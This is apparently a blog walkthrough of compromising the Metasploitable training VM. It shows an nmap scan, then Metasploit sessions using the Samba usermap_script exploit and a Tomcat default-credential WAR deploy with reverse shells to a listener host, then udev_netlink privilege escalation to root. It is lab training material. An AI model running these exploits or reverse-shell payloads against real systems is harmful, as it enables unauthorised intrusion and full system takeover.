Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.
I started with NMAP as usual:
root@kali:~# nmap -sS -A 192.168.1.22
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2013-11-09T15:28:17-05:00
TRACEROUTE
HOP RTT ADDRESS
1 2.16 ms 192.168.1.22
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
As everything is too easy with Metasploit I will show two methods.
Method 1 - Samba
If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:
http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
which is exactly the MSF module we need. Configuring and running MSF:
msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.22 yes The target address
RPORT 139 yes The target port
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.17 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#
As Samba was running with root privileges we are done...
Method 2 - via Tomcat Manager + UDEV Netlink local exploit
There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:
http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy
Here is the related MSF configration:
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST 192.168.1.22 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.17 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55
As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.
I picked up the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink
meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart use exploit/linux/local/sock_sendpage use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec use exploit/linux/local/udev_netlink
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options
Module options (exploit/linux/local/udev_netlink):
Name Current Setting Required Description
---- --------------- -------- -----------
NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(udev_netlink) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100
id
uid=0(root) gid=0(root)
...and we are root.
There are more methods, but I will leave them to you.
No comments:
Post a Comment